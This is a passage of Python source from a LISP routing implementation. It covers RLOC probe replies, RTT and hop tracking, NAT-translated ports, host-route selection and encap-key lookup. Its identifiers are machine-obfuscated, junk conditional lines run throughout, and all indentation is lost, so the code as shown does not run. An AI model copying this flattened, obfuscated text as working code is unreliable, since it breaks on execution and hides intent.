# -1 and "?/?" mean "not yet measured" in the probe RTT/hop fields.
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
if 37 - 37: i1IIi - O0
# Clones themselves are built with recurse=False so they do not recurse.
if ( recurse == False ) : return
if 36 - 36: I1Ii111 . OoooooooOO - i1IIi % iII111i - II111iiii * i11iIiiIii
if 90 - 90: OoOoOO00 % iII111i - Oo0Ooo
if 13 - 13: o0oOOo0O0Ooo / O0 . I1Ii111 * I1Ii111
if 76 - 76: Ii1I - iII111i
if 79 - 79: o0oOOo0O0Ooo + IiII / o0oOOo0O0Ooo - I1IiiI / OoooooooOO
if 17 - 17: OOooOOo * I1ii11iIi11i . Ii1I . iIii1I11I1II1 * OoooooooOO
# With zero or one default-route next-hop there is nothing to clone.
Oo0O00OOOO = lisp_get_default_route_next_hops ( )
if ( Oo0O00OOOO == [ ] or len ( Oo0O00OOOO ) == 1 ) : return
if 7 - 7: ooOoO0o * OoO0O00 / II111iiii % OoOoOO00 * OOooOOo . II111iiii
# First next-hop stays on this instance; each remaining next-hop gets a
# deep-copied clone appended to the next_rloc chain.
self . rloc_next_hop = Oo0O00OOOO [ 0 ]
i11 = self
for I1ii1I1II11II in Oo0O00OOOO [ 1 : : ] :
# NOTE(review): this fresh instance is immediately overwritten by the
# deepcopy on the next line — dead store; confirm before removing.
O0ooo00Oo = lisp_rloc ( False )
O0ooo00Oo = copy . deepcopy ( self )
O0ooo00Oo . rloc_next_hop = I1ii1I1II11II
i11 . next_rloc = O0ooo00Oo
i11 = O0ooo00Oo
if 98 - 98: OOooOOo + i11iIiiIii - i1IIi
if 26 - 26: OoOoOO00 / o0oOOo0O0Ooo . OOooOOo + I1IiiI + Ii1I . iII111i
if 89 - 89: I1Ii111 * I1IiiI . i1IIi - iIii1I11I1II1 * I1Ii111
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 5 - 5: OoOoOO00 % i1IIi
if 31 - 31: Oo0Ooo * O0 . OOooOOo . o0oOOo0O0Ooo + OoO0O00 + II111iiii
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 76 - 76: Oo0Ooo + I1IiiI - O0
if 58 - 58: IiII * i1IIi . I1IiiI - iII111i
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 73 - 73: Oo0Ooo . OoOoOO00
if 50 - 50: IiII / o0oOOo0O0Ooo
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
if 34 - 34: OoooooooOO + OoOoOO00 - Oo0Ooo . OOooOOo * iIii1I11I1II1
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 93 - 93: i11iIiiIii / Oo0Ooo * OoOoOO00 / ooOoO0o + OoO0O00 * OOooOOo
if 81 - 81: IiII * iII111i + i1IIi + I1Ii111 / OoO0O00
def print_rloc ( self , indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , Oo0OO0000oooo , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 83 - 83: oO0o / OoO0O00
if 34 - 34: OoooooooOO - i1IIi * O0
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
Ooo000oo0OO0 = self . rloc_name
if ( cour ) : Ooo000oo0OO0 = lisp_print_cour ( Ooo000oo0OO0 )
return ( 'rloc-name: {}' . format ( blue ( Ooo000oo0OO0 , cour ) ) )
if 83 - 83: I1IiiI + OoO0O00
if 41 - 41: Ii1I + II111iiii . OOooOOo * I1Ii111 / II111iiii
# Populate this RLOC from a received RLOC-record: address/name, any NAT
# translation state found for it, RLE/ELP/geo/JSON attributes, parameters,
# reachability state, and per-RLOC encryption keys.  Returns the encap
# port to use (LISP_DATA_PORT or the NAT-translated port).
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
IIi1I1iII111 = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 32 - 32: Oo0Ooo - Ii1I % o0oOOo0O0Ooo
if 15 - 15: iIii1I11I1II1 * I1ii11iIi11i / ooOoO0o * oO0o % OOooOOo
if 62 - 62: Ii1I / Oo0Ooo . OoO0O00 - OOooOOo
if 89 - 89: o0oOOo0O0Ooo % OoO0O00
# Look up NAT state for a non-null RLOC address; when found, prefer the
# translated address/port over what the RLOC-record carried.
OooO0ooO0o0OO = self . rloc
if ( OooO0ooO0o0OO . is_null ( ) == False ) :
oOOo0O0O = lisp_get_nat_info ( OooO0ooO0o0OO , self . rloc_name )
if ( oOOo0O0O ) :
IIi1I1iII111 = oOOo0O0O . port
# Head of lisp_nat_state_info for this name is the youngest entry.
OO000O0OO0 = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
oOo0O = OooO0ooO0o0OO . print_address_no_iid ( )
ii11IiI = red ( oOo0O , False )
IiO00Oo000 = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 29 - 29: iIii1I11I1II1 / i11iIiiIii + Oo0Ooo
if 99 - 99: I1IiiI - iII111i * Ii1I - OoOoOO00 / i11iIiiIii - i1IIi
if 46 - 46: I1ii11iIi11i * ooOoO0o
if 4 - 4: I1Ii111 * II111iiii
if 4 - 4: ooOoO0o * Oo0Ooo - I1ii11iIi11i % ooOoO0o % OoOoOO00
if 18 - 18: OOooOOo / O0 . OoO0O00 - II111iiii * OOooOOo
if ( oOOo0O0O . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( ii11IiI , IIi1I1iII111 , IiO00Oo000 ) )
if 13 - 13: OoO0O00 % i1IIi . i11iIiiIii / iII111i
if 28 - 28: i1IIi - iII111i + o0oOOo0O0Ooo / Oo0Ooo * oO0o
# Fall back to the youngest NAT entry (unless it was the match itself),
# and discard it too when it has also timed out.
oOOo0O0O = None if ( oOOo0O0O == OO000O0OO0 ) else OO000O0OO0
if ( oOOo0O0O and oOOo0O0O . timed_out ( ) ) :
IIi1I1iII111 = oOOo0O0O . port
ii11IiI = red ( oOOo0O0O . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( ii11IiI , IIi1I1iII111 ,
# I11i
IiO00Oo000 ) )
oOOo0O0O = None
if 42 - 42: OOooOOo * ooOoO0o / i1IIi . i11iIiiIii - oO0o - Ii1I
if 5 - 5: i1IIi + II111iiii . ooOoO0o
if 21 - 21: i1IIi
if 96 - 96: OoOoOO00 * OoOoOO00 % OoO0O00 * iII111i
if 51 - 51: I1IiiI + i11iIiiIii + iII111i
if 57 - 57: Oo0Ooo . oO0o
if 52 - 52: IiII % OoO0O00 - OoO0O00 . I1IiiI + OoO0O00 * ooOoO0o
# Live NAT state: overwrite the record's RLOC with the translated
# address/port and remember the translation on this entry.
if ( oOOo0O0O ) :
if ( oOOo0O0O . address != oOo0O ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( ii11IiI , red ( oOOo0O0O . address , False ) ) )
if 44 - 44: iIii1I11I1II1 / Ii1I - oO0o % i11iIiiIii
self . rloc . store_address ( oOOo0O0O . address )
if 65 - 65: I1ii11iIi11i * Oo0Ooo / Ii1I . OOooOOo * iIii1I11I1II1 + Oo0Ooo
ii11IiI = red ( oOOo0O0O . address , False )
IIi1I1iII111 = oOOo0O0O . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( ii11IiI , IIi1I1iII111 , IiO00Oo000 ) )
if 44 - 44: ooOoO0o * iII111i * IiII % o0oOOo0O0Ooo
self . store_translated_rloc ( OooO0ooO0o0OO , IIi1I1iII111 )
if 45 - 45: OoOoOO00 % o0oOOo0O0Ooo + IiII / i11iIiiIii
if 29 - 29: iIii1I11I1II1 . OoO0O00 / I1IiiI
if 38 - 38: Oo0Ooo / Oo0Ooo % ooOoO0o
if 56 - 56: oO0o / iII111i % i1IIi * II111iiii . Ii1I
# Copy the optional attributes straight from the record.
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 10 - 10: ooOoO0o - I1ii11iIi11i
if 82 - 82: o0oOOo0O0Ooo / I11i - I11i / O0 * I1IiiI / OoO0O00
if 71 - 71: I11i % I11i - i11iIiiIii + iIii1I11I1II1 / iII111i
if 63 - 63: O0 * i11iIiiIii / IiII / IiII
# For an RLE, propagate any NAT-translated port onto each RLE node.
self . rle = rloc_record . rle
if ( self . rle ) :
for Oo0000O00o0 in self . rle . rle_nodes :
Ooo000oo0OO0 = Oo0000O00o0 . rloc_name
oOOo0O0O = lisp_get_nat_info ( Oo0000O00o0 . address , Ooo000oo0OO0 )
if ( oOOo0O0O == None ) : continue
if 72 - 72: i11iIiiIii * OoOoOO00 % oO0o / I1Ii111
IIi1I1iII111 = oOOo0O0O . port
O0Oo0oO0 = Ooo000oo0OO0
if ( O0Oo0oO0 ) : O0Oo0oO0 = blue ( Ooo000oo0OO0 , False )
if 9 - 9: iIii1I11I1II1 . IiII
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( IIi1I1iII111 ,
# I1IiiI + iII111i / Ii1I
Oo0000O00o0 . address . print_address_no_iid ( ) , O0Oo0oO0 ) )
Oo0000O00o0 . translated_port = IIi1I1iII111
if 57 - 57: o0oOOo0O0Ooo
if 69 - 69: i1IIi / i1IIi / OoOoOO00 + ooOoO0o % I1Ii111
if 41 - 41: II111iiii * OOooOOo
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
# A reachable, local, non-probe record marks the RLOC up immediately.
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 8 - 8: I1Ii111 + O0
if 67 - 67: iIii1I11I1II1 . O0
if 40 - 40: OOooOOo - ooOoO0o . OoooooooOO % O0 * I11i - I1ii11iIi11i
if 92 - 92: ooOoO0o % oO0o / i11iIiiIii
# Only store encap keys when the record's RLOC is the packet source.
oOOoooo0O0 = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 68 - 68: I11i / iII111i - IiII . iIii1I11I1II1 / o0oOOo0O0Ooo
if ( rloc_record . keys != None and oOOoooo0O0 ) :
iII1 = rloc_record . keys [ 1 ]
if ( iII1 != None ) :
oOo0O = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( IIi1I1iII111 )
if 54 - 54: II111iiii * I1IiiI
iII1 . add_key_by_rloc ( oOo0O , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( oOo0O , False ) ) )
if 49 - 49: I1ii11iIi11i
if 31 - 31: o0oOOo0O0Ooo - OoOoOO00 + I1ii11iIi11i . oO0o - O0
if 61 - 61: I1ii11iIi11i * II111iiii . i1IIi
return ( IIi1I1iII111 )
if 60 - 60: OoooooooOO % ooOoO0o * i11iIiiIii * OoooooooOO % IiII
if 15 - 15: oO0o
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 40 - 40: I1Ii111
if 77 - 77: II111iiii - o0oOOo0O0Ooo . Ii1I
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 47 - 47: o0oOOo0O0Ooo % OOooOOo + I1Ii111
if 64 - 64: ooOoO0o / IiII . I1IiiI
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 77 - 77: o0oOOo0O0Ooo % I1Ii111 . OOooOOo
return ( True )
if 90 - 90: I11i
if 53 - 53: I1ii11iIi11i + i11iIiiIii / iIii1I11I1II1 + OoooooooOO + IiII * I1IiiI
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
if 16 - 16: i11iIiiIii - oO0o . i11iIiiIii + OoO0O00 + i11iIiiIii
if 85 - 85: I1ii11iIi11i - ooOoO0o + I1Ii111 + I1Ii111
if 13 - 13: II111iiii
def print_state_change ( self , new_state ) :
iIII1Ii1 = self . print_state ( )
IIIiiiI1Ii1 = "{} -> {}" . format ( iIII1Ii1 , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
IIIiiiI1Ii1 = bold ( IIIiiiI1Ii1 , False )
if 53 - 53: i1IIi . OoooooooOO
return ( IIIiiiI1Ii1 )
if 56 - 56: OoooooooOO
if 93 - 93: OoOoOO00
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
if 48 - 48: i1IIi
if 22 - 22: iII111i / OoO0O00 * OOooOOo + I11i
def print_recent_rloc_probe_rtts ( self ) :
o000Oo00oOoO = str ( self . recent_rloc_probe_rtts )
o000Oo00oOoO = o000Oo00oOoO . replace ( "-1" , "?" )
return ( o000Oo00oOoO )
if 28 - 28: I1Ii111 / oO0o % OoooooooOO - I1IiiI / I1IiiI
if 73 - 73: I11i - i1IIi / i11iIiiIii / I1Ii111
def compute_rloc_probe_rtt ( self ) :
i11 = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
II1IIIII1III1 = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ i11 ] + II1IIIII1III1 [ 0 : - 1 ]
if 67 - 67: I1ii11iIi11i - ooOoO0o - Ii1I - OoO0O00 % OoooooooOO
if 22 - 22: oO0o * i1IIi
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
if 54 - 54: I1IiiI * I1IiiI % IiII - i11iIiiIii * o0oOOo0O0Ooo
if 38 - 38: OoOoOO00 / OOooOOo % OoooooooOO * I1ii11iIi11i
def print_recent_rloc_probe_hops ( self ) :
I1IiiI1iIIi1i = str ( self . recent_rloc_probe_hops )
return ( I1IiiI1iIIi1i )
if 46 - 46: II111iiii * iII111i . iII111i % oO0o - i11iIiiIii . I11i
if 74 - 74: OoO0O00 * iII111i / OoO0O00 % Oo0Ooo / i1IIi
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < LISP_RLOC_PROBE_TTL / 2 ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if 77 - 77: IiII % iIii1I11I1II1 / iIii1I11I1II1 * iII111i * Ii1I + I1Ii111
if ( from_ttl < LISP_RLOC_PROBE_TTL / 2 ) :
IIiiII11iiii = "!"
else :
IIiiII11iiii = str ( LISP_RLOC_PROBE_TTL - from_ttl )
if 15 - 15: i11iIiiIii % I1ii11iIi11i % Oo0Ooo
if 65 - 65: II111iiii - i1IIi . I1ii11iIi11i . I11i % OoO0O00 . OoooooooOO
i11 = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + IIiiII11iiii
II1IIIII1III1 = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ i11 ] + II1IIIII1III1 [ 0 : - 1 ]
if 64 - 64: I11i * Oo0Ooo / IiII / II111iiii
if 29 - 29: OoooooooOO - OoO0O00 - Ii1I
# Handle an RLOC-probe reply: find the chained RLOC entry whose probe
# nonce matches, mark it up, record RTT/hops, and (for multi-next-hop
# RLOCs) install a host route via the next-hop with the best RTT.
def process_rloc_probe_reply ( self , nonce , eid , group , hop_count , ttl ) :
# Walk the next_rloc chain looking for the entry that sent this nonce.
OooO0ooO0o0OO = self
while ( True ) :
if ( OooO0ooO0o0OO . last_rloc_probe_nonce == nonce ) : break
OooO0ooO0o0OO = OooO0ooO0o0OO . next_rloc
if ( OooO0ooO0o0OO == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
if 82 - 82: IiII - I1IiiI . iII111i % I11i % Ii1I + iII111i
return
if 87 - 87: i11iIiiIii % i1IIi
if 63 - 63: I1ii11iIi11i + iII111i * o0oOOo0O0Ooo % II111iiii
if 23 - 23: i1IIi * oO0o * oO0o . i11iIiiIii / o0oOOo0O0Ooo
# Stamp the reply, recompute RTT, and bring the RLOC up if it was not;
# a state change also rewrites the map-cache IPC entry.
OooO0ooO0o0OO . last_rloc_probe_reply = lisp_get_timestamp ( )
OooO0ooO0o0OO . compute_rloc_probe_rtt ( )
Oooo = OooO0ooO0o0OO . print_state_change ( "up" )
if ( OooO0ooO0o0OO . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( OooO0ooO0o0OO . rloc , True )
OooO0ooO0o0OO . state = LISP_RLOC_UP_STATE
OooO0ooO0o0OO . last_state_change = lisp_get_timestamp ( )
OoOoooooO00oo = lisp_map_cache . lookup_cache ( eid , True )
if ( OoOoooooO00oo ) : lisp_write_ipc_map_cache ( True , OoOoooooO00oo )
if 50 - 50: o0oOOo0O0Ooo - O0 + OoO0O00
if 22 - 22: I1Ii111 % O0 / I1Ii111 / I1Ii111
OooO0ooO0o0OO . store_rloc_probe_hops ( hop_count , ttl )
if 64 - 64: Oo0Ooo + iIii1I11I1II1 % i1IIi
# Build and emit the log line describing this reply.
Ii1I11IiI1I1 = bold ( "RLOC-probe reply" , False )
oOo0O = OooO0ooO0o0OO . rloc . print_address_no_iid ( )
I1i1IIiI = bold ( str ( OooO0ooO0o0OO . print_rloc_probe_rtt ( ) ) , False )
iIiiI11II11 = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
if 86 - 86: i1IIi
I1ii1I1II11II = ""
if ( OooO0ooO0o0OO . rloc_next_hop != None ) :
Ii , oooOoo0 = OooO0ooO0o0OO . rloc_next_hop
I1ii1I1II11II = ", nh {}({})" . format ( oooOoo0 , Ii )
if 82 - 82: I11i * Ii1I
if 55 - 55: IiII / OoooooooOO
o0OoO00 = green ( lisp_print_eid_tuple ( eid , group ) , False )
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}" ) . format ( Ii1I11IiI1I1 , red ( oOo0O , False ) , iIiiI11II11 , o0OoO00 ,
# iIii1I11I1II1 . O0
Oooo , I1i1IIiI , I1ii1I1II11II , str ( hop_count ) + "/" + str ( ttl ) ) )
if 61 - 61: OoOoOO00 * OOooOOo
# Single-next-hop RLOCs are done; multi-next-hop RLOCs fall through to
# pick the best next-hop by RTT.
if ( OooO0ooO0o0OO . rloc_next_hop == None ) : return
if 3 - 3: I1IiiI + Oo0Ooo / I1Ii111
if 17 - 17: i11iIiiIii / Oo0Ooo . o0oOOo0O0Ooo / I1IiiI . OOooOOo
if 10 - 10: I11i - OoOoOO00
if 49 - 49: I1ii11iIi11i / II111iiii - ooOoO0o / I1Ii111 - oO0o
# Scan the whole chain for the up entry with the lowest measured RTT.
OooO0ooO0o0OO = None
O0o0O000oo = None
while ( True ) :
OooO0ooO0o0OO = self if OooO0ooO0o0OO == None else OooO0ooO0o0OO . next_rloc
if ( OooO0ooO0o0OO == None ) : break
if ( OooO0ooO0o0OO . up_state ( ) == False ) : continue
if ( OooO0ooO0o0OO . rloc_probe_rtt == - 1 ) : continue
if 27 - 27: OoOoOO00 % OoooooooOO
if ( O0o0O000oo == None ) : O0o0O000oo = OooO0ooO0o0OO
if ( OooO0ooO0o0OO . rloc_probe_rtt < O0o0O000oo . rloc_probe_rtt ) : O0o0O000oo = OooO0ooO0o0OO
if 77 - 77: Ii1I % Oo0Ooo
if 30 - 30: iIii1I11I1II1 * Oo0Ooo * OOooOOo * ooOoO0o
# Point the host route for this RLOC at the best next-hop found.
if ( O0o0O000oo != None ) :
Ii , oooOoo0 = O0o0O000oo . rloc_next_hop
I1ii1I1II11II = bold ( "nh {}({})" . format ( oooOoo0 , Ii ) , False )
lprint ( " Install host-route via best {}" . format ( I1ii1I1II11II ) )
lisp_install_host_route ( oOo0O , None , False )
lisp_install_host_route ( oOo0O , oooOoo0 , True )
if 6 - 6: iIii1I11I1II1 / oO0o % ooOoO0o
if 19 - 19: iIii1I11I1II1 + I11i - iIii1I11I1II1 - Ii1I . Ii1I * OoO0O00
if 32 - 32: I1IiiI + OOooOOo * oO0o
def add_to_rloc_probe_list ( self , eid , group ) :
oOo0O = self . rloc . print_address_no_iid ( )
IIi1I1iII111 = self . translated_port
if ( IIi1I1iII111 != 0 ) : oOo0O += ":" + str ( IIi1I1iII111 )
if 100 - 100: OoO0O00
if ( lisp_rloc_probe_list . has_key ( oOo0O ) == False ) :
lisp_rloc_probe_list [ oOo0O ] = [ ]
if 20 - 20: Ii1I % OoO0O00
if 85 - 85: i1IIi % iIii1I11I1II1
if ( group . is_null ( ) ) : group . instance_id = 0
for O0OooO0oo , o0OoO00 , II1IIiIiiI1iI in lisp_rloc_probe_list [ oOo0O ] :
if ( o0OoO00 . is_exact_match ( eid ) and II1IIiIiiI1iI . is_exact_match ( group ) ) :
if ( O0OooO0oo == self ) :
if ( lisp_rloc_probe_list [ oOo0O ] == [ ] ) :
lisp_rloc_probe_list . pop ( oOo0O )
if 10 - 10: O0 . oO0o * I1IiiI
return
if 21 - 21: OoooooooOO
lisp_rloc_probe_list [ oOo0O ] . remove ( [ O0OooO0oo , o0OoO00 , II1IIiIiiI1iI ] )
break
if 76 - 76: i1IIi * i11iIiiIii / OOooOOo + I1Ii111
if 50 - 50: oO0o % OoOoOO00 + I1IiiI
lisp_rloc_probe_list [ oOo0O ] . append ( [ self , eid , group ] )
if 15 - 15: II111iiii - iII111i / I1ii11iIi11i
if 81 - 81: Ii1I - i1IIi % oO0o * Oo0Ooo * OoOoOO00
if 79 - 79: oO0o + I1IiiI % iII111i + II111iiii % OoO0O00 % iII111i
if 46 - 46: o0oOOo0O0Ooo
if 61 - 61: OoO0O00 . O0 + I1ii11iIi11i + OoO0O00
OooO0ooO0o0OO = lisp_rloc_probe_list [ oOo0O ] [ 0 ] [ 0 ]
if ( OooO0ooO0o0OO . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
if 44 - 44: I11i . oO0o
if 65 - 65: I1ii11iIi11i * II111iiii % I11i + II111iiii . i1IIi / ooOoO0o
if 74 - 74: OoOoOO00 % OoO0O00 . OoOoOO00
def delete_from_rloc_probe_list ( self , eid , group ) :
oOo0O = self . rloc . print_address_no_iid ( )
IIi1I1iII111 = self . translated_port
if ( IIi1I1iII111 != 0 ) : oOo0O += ":" + str ( IIi1I1iII111 )
if ( lisp_rloc_probe_list . has_key ( oOo0O ) == False ) : return
if 16 - 16: OoO0O00 / Ii1I * i11iIiiIii / o0oOOo0O0Ooo + I1Ii111
i1IiI1IIIIi = [ ]
for iIiiiIIiii in lisp_rloc_probe_list [ oOo0O ] :
if ( iIiiiIIiii [ 0 ] != self ) : continue
if ( iIiiiIIiii [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( iIiiiIIiii [ 2 ] . is_exact_match ( group ) == False ) : continue
i1IiI1IIIIi = iIiiiIIiii
break
if 51 - 51: iIii1I11I1II1 * Oo0Ooo + ooOoO0o
if ( i1IiI1IIIIi == [ ] ) : return
if 58 - 58: I11i / i11iIiiIii . iII111i
try :
lisp_rloc_probe_list [ oOo0O ] . remove ( i1IiI1IIIIi )
if ( lisp_rloc_probe_list [ oOo0O ] == [ ] ) :
lisp_rloc_probe_list . pop ( oOo0O )
if 80 - 80: II111iiii + OoO0O00 % ooOoO0o + i11iIiiIii
except :
return
if 30 - 30: Ii1I / I1ii11iIi11i % IiII - Oo0Ooo
if 100 - 100: IiII . I1Ii111 * oO0o % OoO0O00 . iIii1I11I1II1 * Oo0Ooo
if 100 - 100: IiII - OoOoOO00 % iII111i
# Build a multi-line display of RLOC-probe state (request sent, reply
# received, rtt) for this RLOC and every chained per-next-hop clone.
def print_rloc_probe_state ( self , trailing_linefeed ) :
o0OooooOoOO = ""
OooO0ooO0o0OO = self
while ( True ) :
# Missing timestamps print as elapsed-from-0 via lisp_print_elapsed.
iIII = OooO0ooO0o0OO . last_rloc_probe
if ( iIII == None ) : iIII = 0
IiiIii = OooO0ooO0o0OO . last_rloc_probe_reply
if ( IiiIii == None ) : IiiIii = 0
I1i1IIiI = OooO0ooO0o0OO . print_rloc_probe_rtt ( )
o0 = space ( 4 )
if 52 - 52: O0 - I1Ii111 + oO0o % ooOoO0o . oO0o
if ( OooO0ooO0o0OO . rloc_next_hop == None ) :
o0OooooOoOO += "RLOC-Probing:\n"
else :
Ii , oooOoo0 = OooO0ooO0o0OO . rloc_next_hop
o0OooooOoOO += "RLOC-Probing for nh {}({}):\n" . format ( oooOoo0 , Ii )
if 60 - 60: oO0o + o0oOOo0O0Ooo - OOooOOo % o0oOOo0O0Ooo . I11i + OoO0O00
if 27 - 27: i11iIiiIii - I1ii11iIi11i * I1Ii111 . I1IiiI / OoO0O00 * ooOoO0o
o0OooooOoOO += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( o0 , lisp_print_elapsed ( iIII ) ,
# OOooOOo . OoO0O00 + OoO0O00
o0 , lisp_print_elapsed ( IiiIii ) , I1i1IIiI )
if 19 - 19: iII111i * i1IIi / iII111i
if ( trailing_linefeed ) : o0OooooOoOO += "\n"
if 21 - 21: ooOoO0o / o0oOOo0O0Ooo % I1ii11iIi11i . Ii1I . IiII
# Advance to the next per-next-hop clone, if any.
OooO0ooO0o0OO = OooO0ooO0o0OO . next_rloc
if ( OooO0ooO0o0OO == None ) : break
o0OooooOoOO += "\n"
if 8 - 8: I1ii11iIi11i / ooOoO0o + II111iiii
return ( o0OooooOoOO )
if 45 - 45: ooOoO0o - OOooOOo * IiII % iII111i . OoOoOO00 / i11iIiiIii
if 63 - 63: Oo0Ooo * iIii1I11I1II1 / ooOoO0o
def get_encap_keys ( self ) :
IIi1I1iII111 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 46 - 46: OoOoOO00 / iII111i - OoO0O00 . o0oOOo0O0Ooo
oOo0O = self . rloc . print_address_no_iid ( ) + ":" + IIi1I1iII111
if 50 - 50: I1Ii111 . O0 . OoOoOO00 + I1Ii111 + OoooooooOO . i11iIiiIii
try :
O0000 = lisp_crypto_keys_by_rloc_encap [ oOo0O ]
if ( O0000 [ 1 ] ) : return ( O0000 [ 1 ] . encrypt_key , O0000 [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 65 - 65: I1IiiI % iIii1I11I1II1
if 52 - 52: I1IiiI
if 19 - 19: I1IiiI
def rloc_recent_rekey ( self ) :
IIi1I1iII111 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 17 - 17: I11i + OoooooooOO
oOo0O = self . rloc . print_address_no_iid ( ) + ":" + IIi1I1iII111
if 63 - 63: IiII
try :
iII1 = lisp_crypto_keys_by_rloc_encap [ oOo0O ] [ 1 ]
if ( iII1 == None ) : return ( False )
if ( iII1 . last_rekey == None ) : return ( True )
return ( time . time ( ) - iII1 . last_rekey < 1 )
except :
return ( False )
if 3 - 3: oO0o * II111iiii . O0
if 19 - 19: I1IiiI / I1IiiI / Oo0Ooo + oO0o + i1IIi
if 31 - 31: iII111i / OoooooooOO - I1Ii111 . iII111i
if 38 - 38: ooOoO0o . OoooooooOO - II111iiii * i11iIiiIii / i1IIi . OoooooooOO
# lisp_mapping: one EID-prefix (plus optional multicast group) mapped to a
# set of RLOCs, with TTL/refresh bookkeeping and per-mapping statistics.
class lisp_mapping ( ) :
# Build a mapping for (eid, group) with the supplied RLOC set.  An empty
# string for eid/group is normalized to a wildcard lisp_address.
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
# None TTL means "never expires" (see print_ttl/has_ttl_elapsed).
self . map_cache_ttl = None
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
if 51 - 51: oO0o - I1ii11iIi11i + I1ii11iIi11i
